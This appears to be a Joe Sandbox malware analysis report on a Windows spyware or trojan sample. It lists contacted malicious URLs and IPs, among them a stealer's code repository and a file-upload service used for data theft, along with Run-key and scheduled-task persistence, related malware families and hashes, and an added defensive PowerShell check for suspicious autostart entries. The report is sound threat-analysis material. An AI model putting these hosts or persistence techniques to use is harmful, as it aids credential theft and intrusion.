                                                                                                                                                                https://html.spec.whatwg.org/multipage/DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsDE5A.exe, 0000002E.00000002.2586962906.000001E8E7CA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://api.msn.com/qexplorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngDE5A.exe, 00000016.00000002.2466473798.000001F012510000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngzDE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://api.gofile.io/getServerDE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://2no.co/1gFnW4ZwEnd.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
IP                Domain               Country         ASN     ASN Name              Malicious
104.21.79.229     2no.co               United States   13335   CLOUDFLARENETUS       false
208.95.112.1      ip-api.com           United States   53334   TUT-ASUS              false
65.108.69.93      makemoneyminds.com   United States   11022   ALABANZA-BALTUS       true
178.237.33.50     geoplugin.net        Netherlands     8455    ATOM86-ASATOM86NL     false
193.149.176.178   unknown              Denmark         15411   DANISCODK             true
179.159.229.64    cellc.org            Brazil          28573   CLAROSABR             true

IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1438370
Start date and time: 2024-05-08 16:39:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 68
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Og1SeeXcB2.exe (renamed because the original name is a hash value)
Original Sample Name: 150e9ffdac7f2361c2efa735929aa268.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@108/171@11/7
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 57%
• Number of executed functions: 100
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs (whitelisted): 20.12.23.50, 13.95.31.18, 20.242.39.171
• Excluded domains (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target End.pif, PID 7072, because it has no executed functions
• HTTPS proxy raw data packets have been limited to 10 per session. See the PCAPs for the complete data.
• Not all processes were analysed; the report is missing behaviour information for them
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behaviour information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtCreateKey calls found
• Report size getting too big: too many NtEnumerateKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtSetInformationFile calls found
• VT rate limit hit for: Og1SeeXcB2.exe
Time | Type | Description
15:40:58 | Task Scheduler | Run new task: Firefox Default Browser Agent A7A352029D595E2B, path: C:\Users\user\AppData\Roaming\wsruwii
15:41:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, Rmc-ZZZU66 = "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
15:41:51 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, Rmc-ZZZU66 = "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
15:42:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, Rmc-ZZZU66 = "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
16:40:58 | API Interceptor | 2x Sleep call for process wsruwii modified
16:41:00 | API Interceptor | 5428x Sleep call for process explorer.exe modified
16:41:31 | API Interceptor | 1x Sleep call for process WMIC.exe modified
16:41:32 | API Interceptor | 84x Sleep call for process powershell.exe modified
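The timeline above records two persistence mechanisms worth checking on a live host: a Run-key value named Rmc-ZZZU66 in both HKCU and HKLM that points at an executable under %APPDATA%, and a scheduled task whose name resembles the Firefox Default Browser Agent task but whose action is C:\Users\user\AppData\Roaming\wsruwii. The legitimate Mozilla task runs from the Firefox installation directory under Program Files, so the action path, not the task name, is the tell. The PowerShell below is an added triage check, not part of the Joe Sandbox report: it enumerates the same Run keys (with HKLM's WOW6432Node view added for the 32-bit registry view) and every scheduled task action, and reports any whose target resolves into a user-writable directory. The $UserWritableRoots list, the helper name Test-UserWritablePath and the output object shape are choices of this example; run it from an elevated session so HKLM and all task folders are readable.

```powershell
# Added example (not from the Joe Sandbox report): find autostart entries whose
# target lives in a user-writable directory, the pattern seen in the timeline
# (Rmc-ZZZU66 -> %APPDATA%\WindowsUpdateServices\WindowsUpdateServices.exe and
# a scheduled task -> %APPDATA%\wsruwii). Roots list is an assumption of this example.

$UserWritableRoots = @(
    [Environment]::GetFolderPath('ApplicationData'),       # %APPDATA%
    [Environment]::GetFolderPath('LocalApplicationData'),  # %LOCALAPPDATA%
    [IO.Path]::GetTempPath(),                              # %TEMP%
    (Join-Path $env:SystemDrive 'Users\Public')
)

# Registry value names PowerShell's provider adds to every Get-ItemProperty result.
$ProviderNoise = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Test-UserWritablePath {
    param([string]$CommandLine)
    # Extract the executable from a Run-key command line; tolerate quoting and arguments.
    $exe = if ($CommandLine -match '^\s*"([^"]+)"') { $Matches[1] }
           else { ($CommandLine -split '\s+')[0] }
    $expanded = [Environment]::ExpandEnvironmentVariables($exe)
    foreach ($root in $UserWritableRoots) {
        if ($expanded.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# 1. Run-key values (the Rmc-ZZZU66 entries in the timeline would surface here).
foreach ($key in $RunKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($ProviderNoise -contains $p.Name) { continue }
        if (Test-UserWritablePath ([string]$p.Value)) {
            [PSCustomObject]@{ Source = $key; Name = $p.Name; Target = [string]$p.Value }
        }
    }
}

# 2. Scheduled task actions (the fake "Firefox Default Browser Agent" task would surface here).
#    ComHandler actions have no Execute property and are skipped.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        if ($a.Execute -and (Test-UserWritablePath $a.Execute)) {
            [PSCustomObject]@{ Source = 'Task:' + $task.TaskPath; Name = $task.TaskName; Target = $a.Execute }
        }
    }
}
```

Every hit is a candidate, not a verdict: some legitimate per-user installers (update agents, chat clients) also autostart from %LOCALAPPDATA%, so compare each Target against the report's paths and against the installed software inventory before acting.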
Match | Associated sample name / URL | Detection | Threat name | Context
104.21.79.229 | file.exe | malicious | SmokeLoader |
 | setup.hta | malicious | RHADAMANTHYS |
 | setup.lnk | malicious | RHADAMANTHYS |
 | Blog.zip | malicious | RHADAMANTHYS |
 | file.exe | malicious | RedLine, SmokeLoader |
 | file.exe | malicious | RedLine, SmokeLoader |
 | file.exe | malicious | RedLine, SmokeLoader |
 | file.exe | malicious | RedLine, SmokeLoader |
 | file.exe | malicious | BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz |
 | rlRiFBcuVa.exe | malicious | RedLine, SmokeLoader, Xmrig |
208.95.112.1 | AUS5YMhYPA.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | SecuriteInfo.com.FileRepMalware.27177.7318.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | IUCrkcRx5g.exe | malicious | AgentTesla, Discord Token Stealer, PureLog Stealer | ip-api.com/line/?fields=hosting
 | 2o7qgGh58q.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
 | 5h7bS5VNtY.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | 14posdLrGh.exe | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
 | CA-OP2402406.xla | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | CA-OP2402406.xla | malicious | AgentTesla | ip-api.com/line/?fields=hosting
 | VADliS09qx.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
 | fG9gFsyfsK.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
65.108.69.93 | FATURA PROFORMA.exe | malicious | AgentTesla |
178.237.33.50 | cA9hz5Cg8N.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | BX4d0gOn75.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | 2VhDZkPrvg.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | 0093748762022.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
 | N7rv2A6qGR.rtf | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | 20240506_120821.bat | malicious | Remcos, DBatLoader, PrivateLoader | geoplugin.net/json.gp
 | 51hk2L6Kgw.exe | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | invoice cum packing list #4_fdp.Scr.exe | malicious | Remcos, PrivateLoader, PureLog Stealer | geoplugin.net/json.gp
 | RFQ_39573837483837438744.xls | malicious | Remcos, PrivateLoader | geoplugin.net/json.gp
 | INQUIRY#46789-MAY_product_materials.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated sample name / URL | Detection | Threat name | Context
c-0005.c-dc-msedge.net | http://FrontierDermatology.com | malicious | Unknown | 13.107.12.50
 | https://pub-799997a60b9345ec9a145cd96ecb477e.r2.dev/mafo.html? | malicious | HTMLPhisher | 13.107.12.50
 | https://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=lexnet.com.na/new/asdff/asdff/SILENTCODERSLIMAHURUF/patrick.williams@coldwellbanker.com | malicious | HtmlDropper, HTMLPhisher | 13.107.12.50
 | https://trevorservices.trevor3340.workers.dev/ | malicious | HTMLPhisher | 13.107.12.50
 | https://r20.rs6.net/tn.jsp?f=001GFT1RVMqvpjgRM6sbgEwJNRjqgv9q4ZCJm2b9IdhU7r8P2-TQbsOQ6xGs4_vvOTBtzi9KC5_liuXvMvutgms-cn4Z-vgppYEh90_D9NRk7cxuNuDTgArm6b107oTOlnyeCo4JgLEnEWte48n1LHpOPJMz_bqJrMgevxq2xXIUKCZreGaciJArQ==&c=dMRnUzAhvVRggU9sYamjgpdXKkNgBnFMdxUnAiJlAo6w7iRXuCS-kw==&ch=wDPBSVKJ431sZxRqvZkPjC5Vo3FWD5i29Qd8o3FFJ-V8R9lEI4rFOw== | malicious | Unknown | 13.107.12.50
 | d09693af02eaf96239b0cfb3b0aeefbfc6ec97a09cba8.exe | malicious | LummaC Stealer | 13.107.12.50
ip-api.com | Proce.zip | malicious | Unknown | 208.95.112.1
 | AUS5YMhYPA.exe | malicious | AgentTesla | 208.95.112.1
 | SecuriteInfo.com.FileRepMalware.27177.7318.exe | malicious | AgentTesla | 208.95.112.1
 | IUCrkcRx5g.exe | malicious | AgentTesla, Discord Token Stealer, PureLog Stealer | 208.95.112.1
 | 2o7qgGh58q.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
 | 5h7bS5VNtY.exe | malicious | AgentTesla | 208.95.112.1
                                                                                                                                                                                                            14posdLrGh.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            VADliS09qx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            2no.cofile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.149.76
                                                                                                                                                                                                            setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            qG2cUr0x4A.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • 172.67.149.76
                                                                                                                                                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • 172.67.149.76
                                                                                                                                                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • 104.21.79.229
                                                                                                                                                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                            • 172.67.149.76
                                                                                                                                                                                                            cellc.orgfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                            • 186.10.34.243
                                                                                                                                                                                                            geoplugin.netcA9hz5Cg8N.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            BX4d0gOn75.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            2VhDZkPrvg.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            0093748762022.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            N7rv2A6qGR.rtfGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            20240506_120821.batGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            51hk2L6Kgw.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            invoice cum packing list #4_fdp.Scr.exeGet hashmaliciousRemcos, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            RFQ_39573837483837438744.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            INQUIRY#46789-MAY_product_materials.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                            • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DANISCODK | SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | malicious | PrivateLoader, PureLog Stealer | 193.149.170.60
DANISCODK | Unterlagen_Koenig-Betonsteine_040151_27022024_PDF.js | malicious | Unknown | 193.149.129.129
DANISCODK | 8holJWXFZe.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | 195.85.23.180
DANISCODK | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | 195.85.23.95
DANISCODK | bomb.bin.exe | malicious | LummaC, Amadey, HTMLPhisher, Fabookie, LummaC Stealer, PureLog Stealer, RedLine | 193.149.129.9
DANISCODK | BZn4UNNMPW.exe | malicious | LummaC Stealer | 195.85.115.195
DANISCODK | imgview.exe | malicious | LummaC Stealer | 195.85.115.195
DANISCODK | 2023-11-24_155912-IMGx64_Your squirrel with love.exe | malicious | LummaC Stealer | 195.85.115.195
DANISCODK | t4.exe | malicious | Unknown | 195.85.115.195
DANISCODK | doc_order_11.22.2023_00801.js | malicious | Unknown | 195.85.115.195
CLOUDFLARENETUS | Updated Order.xls | malicious | GuLoader | 172.67.170.209
CLOUDFLARENETUS | what is a mutual legal reserve company 20594.js | malicious | Unknown | 172.67.175.155
CLOUDFLARENETUS | https://flow.page/coltsdocs | malicious | Unknown | 104.18.125.91
CLOUDFLARENETUS | http://nnjohnlewls.com | malicious | Unknown | 172.67.138.248
CLOUDFLARENETUS | http://link.csrwire.com/ls/click?upn=u001.Si0DiArC1V8ZAnBzMk9-2BdVKW245QccVJHq5a8ac9PL1cxKEohrdYzj-2Bi8X2xywdF5x014kxhAPztuH7dRixzSCWE-2BJwchVhYZ74Ivk5CnEAPFl7yJBY43wNoXEBfuRY7zCLn7IFjGzLO2VDHwzMa6b1dQgFTMqVrhr7lYKJs9qSYs-2BIWqneYUpThOMtW8ZRR6Iy8ZluudY9oUF69ErkVqOVAJW472Wzw-2BHmV6urWOzntOZkhIzCC1Os94fIAkxGl0WGOq3FrXnC-2BP3KcFEpBkRAt1Z0NLOXIgJDRjDpdzf8QVmdsltakWwjFCKCx5v49BM6f_N-2FtxmC0N52cApv8jMZRESW2XSux5V9jnrzMr4WK-2B1biwh3Iudenap2CSQVsXPkaNCpzLmYqYDKfM-2Bb7D-2Fd0IleCbnYFgVb47XKq1vrZADVurlYw6JBaxo-2BRiD9m9jvGIbKp3nDUnGfVkjbTf8EuLwm-2BSOeRYfU3NELj95DI4dAbNrgkophtqoi4AKBYCPdDyj470mR5vujURvt3vMVIlGGjrCfrn8zG-2BNOHzxk-2FV7To-3D | malicious | HTMLPhisher | 172.67.196.88
CLOUDFLARENETUS | http://2rimpianti.offerproposalfiledocument.xyz | malicious | Unknown | 104.17.2.184
CLOUDFLARENETUS | yyyyyyyyyyyy.msg | malicious | DarkGate, MailPassView | 1.1.1.1
CLOUDFLARENETUS | https://myworkspace78243.myclickfunnels.com/mapplewell | malicious | HtmlDropper, HTMLPhisher | 104.21.82.119
CLOUDFLARENETUS | https://flow.page/ravendocs | malicious | Unknown | 104.18.125.91
CLOUDFLARENETUS | https://flow.page/coltsdocs | malicious | Unknown | 104.18.125.91
ALABANZA-BALTUS | file.exe | malicious | PrivateLoader, Vidar | 65.109.242.112
ALABANZA-BALTUS | bRlvBJEl6T.exe | malicious | Vidar | 65.108.152.56
ALABANZA-BALTUS | cXwjp02Fln.exe | malicious | DCRat, Vidar | 65.108.152.56
ALABANZA-BALTUS | SecuriteInfo.com.Win32.Evo-gen.3763.25878.exe | malicious | Vidar | 65.108.152.56
ALABANZA-BALTUS | file.exe | malicious | Vidar | 65.109.242.112
ALABANZA-BALTUS | file.exe | malicious | Vidar | 65.108.152.56
ALABANZA-BALTUS | file.exe | malicious | Vidar | 65.108.152.56
ALABANZA-BALTUS | file.exe | malicious | PureLog Stealer, Vidar | 65.108.152.56
ALABANZA-BALTUS | BS4GDarWw6.exe | malicious | Vidar | 65.108.93.119
ALABANZA-BALTUS | e5oMWYWLig.exe | malicious | RedLine | 65.108.19.51
TUT-ASUS | Proce.zip | malicious | Unknown | 208.95.112.1
TUT-ASUS | AUS5YMhYPA.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | SecuriteInfo.com.FileRepMalware.27177.7318.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | IUCrkcRx5g.exe | malicious | AgentTesla, Discord Token Stealer, PureLog Stealer | 208.95.112.1
TUT-ASUS | 2o7qgGh58q.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | 5h7bS5VNtY.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 14posdLrGh.exe | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
TUT-ASUS | CA-OP2402406.xla | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | CA-OP2402406.xla | malicious | AgentTesla | 208.95.112.1
                                                                                                                                                                                                            VADliS09qx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            ATOM86-ASATOM86NLcA9hz5Cg8N.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            BX4d0gOn75.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            2VhDZkPrvg.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            0093748762022.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            N7rv2A6qGR.rtfGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            20240506_120821.batGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            51hk2L6Kgw.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            invoice cum packing list #4_fdp.Scr.exeGet hashmaliciousRemcos, PrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            RFQ_39573837483837438744.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                                            INQUIRY#46789-MAY_product_materials.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                            • 178.237.33.50
Match / Associated Sample Name / URL / SHA 256 / Detection / Threat Name / Link / Context
Match: a0e9f5d64349fb13191bc781f81f42e1
• Sample: rU53IkLA9a.exe, Detection: malicious, Threat: LummaC, Context: 65.108.69.93
• Sample: uZiOjkF9TL.exe, Detection: malicious, Threat: DBatLoader, Context: 65.108.69.93
• Sample: 20240506_120821.bat, Detection: malicious, Threat: Remcos, DBatLoader, PrivateLoader, Context: 65.108.69.93
• Sample: TY9754500000.xlam.xlsx, Detection: malicious, Threat: Unknown, Context: 65.108.69.93
• Sample: e6csca1N3r.exe, Detection: malicious, Threat: LummaC, Context: 65.108.69.93
• Sample: May-Document-6_2024-1959.xlsx, Detection: malicious, Threat: Unknown, Context: 65.108.69.93
• Sample: ROIC GLOBAL RFQ07052024.cmd, Detection: malicious, Threat: Remcos, DBatLoader, PrivateLoader, Context: 65.108.69.93
• Sample: PO-00295.exe, Detection: malicious, Threat: Remcos, DBatLoader, Context: 65.108.69.93
• Sample: file.exe, Detection: malicious, Threat: Clipboard Hijacker, RisePro Stealer, Context: 65.108.69.93
• Sample: file.exe, Detection: malicious, Threat: RisePro Stealer, Context: 65.108.69.93
Match: 37f463bf4616ecd445d4a1937da06e19
• Sample: file.exe, Detection: malicious, Threat: PrivateLoader, Vidar, Context: 104.21.79.229
• Sample: BundleSweetIMSetup.exe, Detection: malicious, Threat: Unknown, Context: 104.21.79.229
• Sample: cf3fLcs0m0.exe, Detection: malicious, Threat: GuLoader, Context: 104.21.79.229
• Sample: j4SPw1P5CF.exe, Detection: malicious, Threat: GuLoader, Context: 104.21.79.229
• Sample: zRzF6YcnMD.exe, Detection: malicious, Threat: GuLoader, Context: 104.21.79.229
• Sample: 20240508VEPA-Zapytanie o ofertę handlową.vbs, Detection: malicious, Threat: AgentTesla, GuLoader, Context: 104.21.79.229
• Sample: ORDER-240507-2789FT.js, Detection: malicious, Threat: WSHRat, Context: 104.21.79.229
• Sample: Metrology-Hydraulic press TPC-3 machine.vbs, Detection: malicious, Threat: AgentTesla, GuLoader, Context: 104.21.79.229
• Sample: WT0003-08524-pdf.hta, Detection: malicious, Threat: AgentTesla, GuLoader, Context: 104.21.79.229
• Sample: Fyge206.exe, Detection: malicious, Threat: FormBook, GuLoader, Context: 104.21.79.229
Match / Associated Sample Name / URL / SHA 256 / Detection / Threat Name / Link / Context
Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
• Sample: cXwjp02Fln.exe, Detection: malicious, Threat: DCRat, Vidar
• Sample: SecuriteInfo.com.Win32.Evo-gen.3763.25878.exe, Detection: malicious, Threat: Vidar
• Sample: l25hnb64Pt.exe, Detection: malicious, Threat: RHADAMANTHYS
• Sample: l25hnb64Pt.exe, Detection: malicious, Threat: RHADAMANTHYS
• Sample: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, Detection: malicious, Threat: LummaC
• Sample: file.exe, Detection: malicious, Threat: SmokeLoader
• Sample: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Threat: Vidar
• Sample: SecuriteInfo.com.Win32.PWSX-gen.28191.20359.exe, Detection: malicious, Threat: Vidar
• Sample: 3hKak4Fdou.exe, Detection: malicious, Threat: RisePro Stealer
• Sample: gaVr0jXXLk.exe, Detection: malicious, Threat: RisePro Stealer
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 947288
Entropy (8bit): 6.630612696399572
Encrypted: false
SSDEEP: 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5: 62D09F076E6E0240548C2F837536A46A
SHA1: 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256: 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
